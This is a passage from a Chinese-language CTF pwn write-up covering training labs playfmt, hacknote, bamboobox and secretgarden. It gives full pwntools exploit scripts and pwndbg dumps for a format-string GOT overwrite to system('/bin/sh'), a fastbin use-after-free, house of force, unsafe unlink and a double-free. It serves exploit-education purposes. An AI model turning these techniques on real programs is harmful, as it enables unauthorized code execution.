io.sendlineafter(" :", payload) 579 | io.interactive() 580 | io.close() 581 | ``` 582 | 583 | 如果想要自己实现 fmtstr\_payload 功能,可以参考这篇 [**文章**](https://paper.seebug.org/246/) 584 | 585 | ### lab9-playfmt 586 | 587 | 和上一道题相比, lab9 的格式化字符串不在栈上,在全局变量 (.bss) 段, 因此我们就不能直接控制栈上的变量来进行修改 got 等行为,但可以通过控制 588 | ```assembly 589 | Breakpoint *do_fmt+64 590 | pwndbg> stack 25 591 | 00:0000│ esp 0xffffd0c0 —▸ 0x804a060 (buf) ◂— 0xa7025 /* '%p\n' */ 592 | 01:0004│ 0xffffd0c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 593 | 02:0008│ 0xffffd0c8 ◂— 0x4 594 | 03:000c│ 0xffffd0cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 595 | 04:0010│ 0xffffd0d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 596 | 05:0014│ 0xffffd0d4 —▸ 0xf7fa4000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 597 | 06:0018│ ebp 0xffffd0d8 —▸ 0xffffd0e8 —▸ 0xffffd0f8 ◂— 0x0 598 | 07:001c│ 0xffffd0dc —▸ 0x8048584 (play+59) ◂— nop 599 | 08:0020│ 0xffffd0e0 —▸ 0xf7fa4d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 600 | 09:0024│ 0xffffd0e4 ◂— 0x0 601 | 0a:0028│ 0xffffd0e8 —▸ 0xffffd0f8 ◂— 0x0 602 | 0b:002c│ 0xffffd0ec —▸ 0x80485b1 (main+42) ◂— nop 603 | 0c:0030│ 0xffffd0f0 —▸ 0xf7fa43dc (__exit_funcs) —▸ 0xf7fa51e0 (initial) ◂— 0x0 604 | 0d:0034│ 0xffffd0f4 —▸ 0xffffd110 ◂— 0x1 605 | 0e:0038│ 0xffffd0f8 ◂— 0x0 606 | 0f:003c│ 0xffffd0fc —▸ 0xf7e09276 (__libc_start_main+246) ◂— add esp, 0x10 607 | 10:0040│ 0xffffd100 ◂— 0x1 608 | 11:0044│ 0xffffd104 —▸ 0xf7fa4000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 609 | 12:0048│ 0xffffd108 ◂— 0x0 610 | 13:004c│ 0xffffd10c —▸ 0xf7e09276 (__libc_start_main+246) ◂— add esp, 0x10 611 | 14:0050│ 0xffffd110 ◂— 0x1 612 | 15:0054│ 0xffffd114 —▸ 0xffffd1a4 —▸ 0xffffd342 ◂— 0x6d6f682f ('/hom') 613 | 16:0058│ 0xffffd118 —▸ 0xffffd1ac —▸ 0xffffd375 ◂— 0x5f474458 ('XDG_') 614 | 17:005c│ 0xffffd11c ◂— 0x0 615 | ... ↓ 616 | pwndbg> 617 | ``` 618 | 如上 0x15, 0x16, 0x06 出的指针指向栈上的变量, 如修改 0x15 处为 619 | ```assembly 620 | 15:0054│ 0xffffd114 —▸ 0xffffd1a4 —▸ 0xffffd0dc —▸ 0x8048584 (play+59) 621 | ``` 622 | 然后再将 0x8048584 修改为某个 got 地址, 就可以实现间接地写 got 了, 这种方式也基本成了一种固定的套路, 如 hackme.inndy 的 [echo3](https://github.com/0x01f/pwn_repo/tree/master/inndy_echo3) 一道题 623 | 624 | #### exp 625 | 为了解释清楚整个利用的过程, 我把我调试时的信息也放到脚本里了 626 | ```python 627 | #!/usr/bin/env python 628 | # -*- coding: utf-8 -*- 629 | __Auther__ = 'M4x' 630 | 631 | from pwn import * 632 | context.arch = 'i386' 633 | context.terminal = ['deepin-terminal', '-x', 'sh', '-c'] 634 | 635 | io = process("./playfmt") 636 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 637 | elf = ELF("./playfmt") 638 | 639 | ''' 640 | Breakpoint *do_fmt+64 641 | pwndbg> x/3s 0x804a060 642 | 0x804a060 : "..%8$p....%6$p."... 643 | 0x804a06f : ".11111111" 644 | 0x804a079 : "" 645 | pwndbg> stack 25 646 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x38252e2e ('..%8') 647 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 648 | 02:0008│ 0xffa077c8 ◂— 0x4 649 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 650 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 651 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 652 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 653 | 07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 654 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 655 | 09:0024│ 0xffa077e4 ◂— 0x0 656 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 657 | 0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 658 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 659 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 660 | 0e:0038│ 0xffa077f8 ◂— 0x0 661 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 662 | 10:0040│ 0xffa07800 ◂— 0x1 663 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 664 | 12:0048│ 0xffa07808 ◂— 0x0 665 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 666 | 14:0050│ 0xffa07810 ◂— 0x1 667 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa083d6 ◂— './playfmt' 668 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa083e0 ◂— 'NO_AT_BRIDGE=1' 669 | 17:005c│ 0xffa0781c ◂— 0x0 670 | ... ↓ 671 | ''' 672 | gdb.attach(io, "b *do_fmt+64\nc") 673 | io.send("..%8$p....%6$p..11111111\0") 674 | io.recvuntil("..") 675 | libc.address = int(io.recvuntil("..", drop = True), 16) - libc.sym['_IO_2_1_stdout_'] 676 | success("libc.address -> {:#x}".format(libc.address)) 677 | io.recvuntil("..") 678 | stack = int(io.recvuntil("..", drop = True), 16) - 0x28 679 | success("stack -> {:#x}".format(stack)) 680 | pause() 681 | 682 | ''' 683 | pwndbg> x/3s 0x804a060 684 | 0x804a060 : "%30684c%21$hn%1"... 685 | 0x804a06f : "6c%22$hn2222222"... 686 | 0x804a07e : "2" 687 | pwndbg> stack 25 688 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x36303325 ('%306') 689 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 690 | 02:0008│ 0xffa077c8 ◂— 0x4 691 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 692 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 693 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 694 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 695 | 07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 696 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 697 | 09:0024│ 0xffa077e4 ◂— 0x0 698 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 699 | 0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 700 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 701 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 702 | 0e:0038│ 0xffa077f8 ◂— 0x0 703 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 704 | 10:0040│ 0xffa07800 ◂— 0x1 705 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 706 | 12:0048│ 0xffa07808 ◂— 0x0 707 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 708 | 14:0050│ 0xffa07810 ◂— 0x1 709 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa083d6 ◂— './playfmt' 710 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa083e0 ◂— 'NO_AT_BRIDGE=1' 711 | 17:005c│ 0xffa0781c ◂— 0x0 712 | ... ↓ 713 | ''' 714 | payload = "%{}c%{}$hn".format((stack + 0x1c) & 0xffff, 0x15) 715 | # payload += "%{}c%{}$hn".format((stack + 0x2c) & 0xffff - (stack + 0x1c) & 0xffff, 0x16) 716 | payload += "%{}c%{}$hn".format(0x10, 0x16) 717 | payload += '22222222\0' 718 | info(payload) 719 | io.sendafter("11111111", payload) 720 | pause() 721 | 722 | ''' 723 | pwndbg> x/3s 0x804a060 724 | 0x804a060 : "%40976c%57$hn%2"... 725 | 0x804a06f : "c%59$hn33333333" 726 | 0x804a07e : "" 727 | pwndbg> stack 25 728 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x39303425 ('%409') 729 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 730 | 02:0008│ 0xffa077c8 ◂— 0x4 731 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 732 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 733 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 734 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 735 | 07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 736 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 737 | 09:0024│ 0xffa077e4 ◂— 0x0 738 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 739 | 0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 740 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 741 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 742 | 0e:0038│ 0xffa077f8 ◂— 0x0 743 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 744 | 10:0040│ 0xffa07800 ◂— 0x1 745 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 746 | 12:0048│ 0xffa07808 ◂— 0x0 747 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 748 | 14:0050│ 0xffa07810 ◂— 0x1 749 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 750 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 751 | 17:005c│ 0xffa0781c ◂— 0x0 752 | ... ↓ 753 | ''' 754 | # gdb.attach(io, "b *do_fmt+64\nc") 755 | payload = "%{}c%{}$hn".format(elf.got['printf'] & 0xffff, 0x39) 756 | # payload += "%{}c%{}$hn".format((elf.got['printf'] & 0xffff + 2) - (elf.got['printf'] & 0xffff), 0x3b) 757 | payload += "%{}c%{}$hn".format(2, 0x3b) 758 | payload += "33333333\0" 759 | info(payload) 760 | io.sendafter("22222222", payload) 761 | pause() 762 | 763 | ''' 764 | pwndbg> x/3s 0x804a060 765 | 0x804a060 : "%211c%11$hhn%31"... 766 | 0x804a06f : "325c%7$hn444444"... 767 | 0x804a07e : "44" 768 | pwndbg> stack 25 769 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 770 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 771 | 02:0008│ 0xffa077c8 ◂— 0x4 772 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 773 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 774 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 775 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 776 | 07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d46930 (printf) ◂— call 0xf7e1dae9 777 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 778 | 09:0024│ 0xffa077e4 ◂— 0x0 779 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 780 | 0b:002c│ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d4 781 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 782 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 783 | 0e:0038│ 0xffa077f8 ◂— 0x0 784 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 785 | 10:0040│ 0xffa07800 ◂— 0x1 786 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 787 | 12:0048│ 0xffa07808 ◂— 0x0 788 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 789 | 14:0050│ 0xffa07810 ◂— 0x1 790 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0xf7d46930 791 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d4 792 | 17:005c│ 0xffa0781c ◂— 0x0 793 | ... ↓ 794 | pwndbg> n 795 | 0x08048540 in do_fmt () 796 | LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 797 | ────────────────────────[ REGISTERS ]──────────────────────── 798 | EAX 0x7b38 799 | EBX 0x0 800 | ECX 0xffa052a0 ◂— 0x20202020 (' ') 801 | EDX 0xf7eb1870 (_IO_stdfile_1_lock) ◂— 0x0 802 | EDI 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 803 | ESI 0x1 804 | EBP 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 805 | ESP 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 806 | EIP 0x8048540 (do_fmt+69) ◂— add esp, 0x10 807 | ─────────────────────────[ DISASM ]────────────────────────── 808 | 0x804853b call printf@plt <0x80483a0> 809 | 810 | ► 0x8048540 add esp, 0x10 811 | 0x8048543 jmp do_fmt+6 <0x8048501> 812 | ↓ 813 | 0x8048501 sub esp, 4 814 | 0x8048504 push 0xc8 815 | 0x8048509 push buf <0x804a060> 816 | 0x804850e push 0 817 | 0x8048510 call read@plt <0x8048390> 818 | 819 | 0x8048515 add esp, 0x10 820 | 0x8048518 sub esp, 4 821 | 0x804851b push 4 822 | ──────────────────────────[ STACK ]────────────────────────── 823 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 824 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 825 | 02:0008│ 0xffa077c8 ◂— 0x4 826 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 827 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 828 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 829 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 830 | 07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d37b30 (system) ◂— sub esp, 0xc 831 | ────────────────────────[ BACKTRACE ]──────────────────────── 832 | ► f 0 8048540 do_fmt+69 833 | f 1 804a010 _GLOBAL_OFFSET_TABLE_+16 834 | f 2 f7eb0d60 _IO_2_1_stdout_ 835 | f 3 804a012 _GLOBAL_OFFSET_TABLE_+18 836 | f 4 f7eb03dc __exit_funcs 837 | f 5 ffa07810 838 | f 6 f7d15276 __libc_start_main+246 839 | pwndbg> stack 25 840 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 841 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 842 | 02:0008│ 0xffa077c8 ◂— 0x4 843 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 844 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 845 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 846 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 847 | 07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d37b30 (system) ◂— sub esp, 0xc 848 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 849 | 09:0024│ 0xffa077e4 ◂— 0x0 850 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 851 | 0b:002c│ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d3 852 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 853 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 854 | 0e:0038│ 0xffa077f8 ◂— 0x0 855 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 856 | 10:0040│ 0xffa07800 ◂— 0x1 857 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 858 | 12:0048│ 0xffa07808 ◂— 0x0 859 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 860 | 14:0050│ 0xffa07810 ◂— 0x1 861 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0xf7d37b30 862 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d3 863 | 17:005c│ 0xffa0781c ◂— 0x0 864 | ... ↓ 865 | pwndbg> got 866 | 867 | GOT protection: Partial RELRO | GOT functions: 6 868 | 869 | [0x804a00c] read@GLIBC_2.0 -> 0xf7dd3c50 (read) ◂— cmp dword ptr gs:[0xc], 0 870 | [0x804a010] printf@GLIBC_2.0 -> 0xf7d37b30 (system) ◂— sub esp, 0xc 871 | [0x804a014] puts@GLIBC_2.0 -> 0xf7d5c870 (puts) ◂— push ebp 872 | [0x804a018] __libc_start_main@GLIBC_2.0 -> 0xf7d15180 (__libc_start_main) ◂— push ebp 873 | [0x804a01c] setvbuf@GLIBC_2.0 -> 0xf7d5cff0 (setvbuf) ◂— push ebp 874 | [0x804a020] strncmp@GLIBC_2.0 -> 0xf7e3a5d0 (__strncmp_sse4_2) ◂— push ebp 875 | ''' 876 | # gdb.attach(io, "b *do_fmt+64\nc") 877 | payload = "%{}c%{}$hhn".format(libc.sym['system'] >> 16 & 0xff, 0xb) 878 | payload += "%{}c%{}$hn".format((libc.sym['system'] & 0xffff) - (libc.sym['system'] >> 16 & 0xff), 0x7) 879 | payload += '44444444\0' 880 | info(payload) 881 | io.sendafter("33333333", payload) 882 | pause() 883 | 884 | io.sendafter("44444444", "/bin/sh\0") 885 | 886 | io.interactive() 887 | io.close() 888 | ``` 889 | 890 | > 可以通过设置标记变量(如我 exp 中的 11111111, 22222222 等)进行输入输出的定位 891 | 892 | ### lab10-hacknote 893 | 894 | 最简单的一种 fastbin uaf 利用,结构体中有函数指针,通过 uaf 控制该函数指针指向 magic 函数即可,uaf 的介绍可以看这个 [**slide**](https://github.com/M4xW4n9/slides/blob/master/pwn_heap/malloc-150821074656-lva1-app6891.pdf) 895 | 896 | exp: 897 | 898 | ```python 899 | lab10 [master●] cat solve.py 900 | #!/usr/bin/env python 901 | # -*- coding: utf-8 -*- 902 | __Auther__ = 'M4x' 903 | 904 | from pwn import * 905 | context.log_level = "debug" 906 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 907 | 908 | def debug(): 909 | raw_input("DEBUG: ") 910 | gdb.attach(io) 911 | 912 | io = process("./hacknote") 913 | elf = ELF("./hacknote") 914 | magic_elf = elf.symbols["magic"] 915 | 916 | 917 | def addNote(size, content): 918 | io.sendafter("choice :", "1") 919 | io.sendafter("size ", str(size)) 920 | io.sendafter("Content :", content) 921 | 922 | def delNote(idx): 923 | # debug() 924 | io.sendafter("choice :", "2") 925 | io.sendafter("Index :", str(idx)) 926 | 927 | def printNote(idx): 928 | # debug() 929 | io.sendafter("choice :", "3") 930 | io.sendafter("Index :", str(idx)) 931 | 932 | def uaf(): 933 | addNote(24, "a" * 24) 934 | addNote(24, "b" * 24) 935 | 936 | delNote(0) 937 | delNote(1) 938 | # debug() 939 | addNote(8,p32(magic_elf)) 940 | 941 | printNote(0) 942 | 943 | if __name__ == "__main__": 944 | uaf() 945 | io.interactive() 946 | io.close() 947 | ``` 948 | 949 | > 说一下怎么修复 IDA 中的结构体 950 | > 951 | > 识别出结构体的具体结构后 952 | > 953 | > - shift+F1, insert 插入识别出的结果 954 | > 955 | > ![](http://ww1.sinaimg.cn/large/006AWYXBly1fq30oi6hn6j30qt0hgjsc.jpg) 956 | > 957 | > - shift+F9, insert 导入我们刚添加的 local type 958 | > 959 | > ![](http://ww1.sinaimg.cn/large/006AWYXBly1fq30podbi2j31490m8jwq.jpg) 960 | > 961 | > - 然后我们在结构体变量上 y 一下,制定其数据类型即可 962 | > 963 | > ![](http://ww1.sinaimg.cn/large/006AWYXBly1fq30qp97hyj30nn06zt9k.jpg) 964 | > 965 | > - 修复的效果图如下: 966 | > 967 | > ![](http://ww1.sinaimg.cn/large/006AWYXBly1fq30rb5bzyj30gd03lmxn.jpg) 968 | 969 | ### lab11-bamboobox 970 | 971 | 可以种 house of force,也可以使用 unsafe unlink,先说 house of force 的方法 972 | 973 | #### house of force 974 | 975 | 简单说一下我对 hof 的理解,如果我们能控制 **top\_chunk** 的 **size**,那么我们就可以通过控制 malloc 一些精心设计的**大数/负数**来实现控制 top\_chunk 的指针,就可以实现任意地址写的效果,个人感觉,hof 的核心思想就在这个 force 上,疯狂 malloc,简单粗暴效果明显 976 | 977 | ```python 978 | lab11 [master●] cat hof.py 979 | #!/usr/bin/env python 980 | # -*- coding: utf-8 -*- 981 | __Auther__ = 'M4x' 982 | 983 | from pwn import * 984 | from zio import l64 985 | from time import sleep 986 | import sys 987 | context.log_level = "debug" 988 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 989 | 990 | io = process("./bamboobox") 991 | 992 | def DEBUG(): 993 | raw_input("DEBUG: ") 994 | gdb.attach(io) 995 | 996 | 997 | def add(length, name): 998 | io.sendlineafter(":", "2") 999 | io.sendlineafter(":", str(length)) 1000 | io.sendafter(":", name) 1001 | 1002 | def change(idx, length, name): 1003 | io.sendlineafter(":", "3") 1004 | io.sendlineafter(":", str(idx)) 1005 | io.sendlineafter(":", str(length)) 1006 | io.sendafter(":", name) 1007 | 1008 | def exit(): 1009 | io.sendlineafter(":", "5") 1010 | 1011 | if __name__ == "__main__": 1012 | add(0x60, cyclic(0x60)) 1013 | # DEBUG() 1014 | change(0, 0x60 + 0x10, cyclic(0x60) + p64(0) + l64(-1)) 1015 | add(-(0x60 + 0x10) - (0x10 + 0x10) - 0x10, 'aaaa') # -(sizeof(item)) - sizeof(box) - 0x10 1016 | add(0x10, p64(ELF("./bamboobox").sym['magic']) * 2) 1017 | exit() 1018 | 1019 | io.interactive() 1020 | io.close() 1021 | ``` 1022 | 1023 | > 快速确定需要 malloc 的大数/负数可以使用 Pwngdb 的 force 功能, 这里我做了一个 [fork](https://github.com/0x01f/Pwngdb), 把 Pwngdb 和 pwndbg 的功能做了一个合并 1024 | 1025 | 1026 | #### unlink 1027 | 1028 | 至于 unlink,在这个 [slide](https://github.com/M4xW4n9/slides/blob/master/pwn_heap/malloc-150821074656-lva1-app6891.pdf) 中有较大篇幅的介绍,就不在说明原理了 1029 | 1030 | ```python 1031 | lab11 [master●] cat unlink.py 1032 | #!/usr/bin/env python 1033 | # -*- coding: utf-8 -*- 1034 | __Auther__ = 'M4x' 1035 | 1036 | from pwn import * 1037 | from time import sleep 1038 | import sys 1039 | context.arch = 'amd64' 1040 | context.log_level = "debug" 1041 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 1042 | 1043 | io = process("./bamboobox") 1044 | # process("./bamboobox").libc will assign libc.address but ELF("./bamboobox") won't 1045 | # libc = io.libc 1046 | elf = ELF("./bamboobox") 1047 | libc = elf.libc 1048 | 1049 | def DEBUG(): 1050 | raw_input("DEBUG: ") 1051 | gdb.attach(io) 1052 | 1053 | def show(): 1054 | io.sendlineafter(":", "1") 1055 | 1056 | def add(length, name): 1057 | io.sendlineafter(":", "2") 1058 | io.sendlineafter(":", str(length)) 1059 | io.sendafter(":", name) 1060 | 1061 | def change(idx, length, name): 1062 | io.sendlineafter(":", "3") 1063 | io.sendlineafter(":", str(idx)) 1064 | io.sendlineafter(":", str(length)) 1065 | io.sendafter(":", name) 1066 | 1067 | def remove(idx): 1068 | io.sendlineafter(":", "4") 1069 | io.sendlineafter(":", str(idx)) 1070 | 1071 | def exit(): 1072 | io.sendlineafter(":", "5") 1073 | 1074 | if __name__ == "__main__": 1075 | add(0x40, '0' * 8) 1076 | add(0x80, '1' * 8) 1077 | add(0x40, '2' * 8) 1078 | ptr = 0x6020c8 1079 | 1080 | fakeChunk = flat([0, 0x41, ptr - 0x18, ptr - 0x10, cyclic(0x20), 0x40, 0x90]) 1081 | change(0, 0x80, fakeChunk) 1082 | remove(1) 1083 | payload = flat([0, 0, 0x40, elf.got['atoi']]) 1084 | change(0, 0x80, payload) 1085 | show() 1086 | libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) - libc.sym['atoi'] 1087 | success("libc.address -> {:#x}".format(libc.address)) 1088 | # libcBase = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) - libc.sym['atoi'] 1089 | # success("libcBase -> {:#x}".format(libcBase)) 1090 | pause() 1091 | 1092 | change(0, 0x8, p64(libc.sym['system'])) 1093 | # change(0, 0x8, p64(libcBase + libc.sym['system'])) 1094 | io.sendline('$0') 1095 | 1096 | io.interactive() 1097 | io.close() 1098 | ``` 1099 | 1100 | 可以看出,通过 house of house 直接控制函数指针进而控制 ip 的方法代码量少了不少,这也提醒我们不要放弃利用任何一个函数指针的机会 1101 | 1102 | ### lab12-secretgarden 1103 | 1104 | 通过 double free 实现 fastbin attack 的题目,所谓 double free,指的就是对同一个 allocated chunk free 两次,这样就可以形成一个类似 **0 -> 1 -> 0** 的 cycled fastbin list,这样当我们 malloc 出 0 时,就可以修改 fastbin list 中 0 的 fd,如 **1 -> 0 -> target**,这样只要我们再 malloc 三次,并通过 malloc 的检查,就可以实现 malloc 到任何地址,进而实现任意地址写,至于 double free 的检查怎么绕过可以看这个 [slide](https://github.com/M4xW4n9/slides/blob/master/pwn_heap/advanceheap-160113090848.pdf) 1105 | 1106 | ```python 1107 | #!/usr/bin/env python 1108 | # -*- coding: utf-8 -*- 1109 | __Auther__ = 'M4x' 1110 | 1111 | from pwn import * 1112 | context.log_level = "debug" 1113 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 1114 | 1115 | def DEBUG(): 1116 | raw_input("DEBUG: ") 1117 | gdb.attach(io, "b *0x4009F2") 1118 | 1119 | def Raise(length, name): 1120 | io.sendlineafter(" : ", "1") 1121 | io.sendlineafter(" :", str(length)) 1122 | io.sendafter(" :", name) 1123 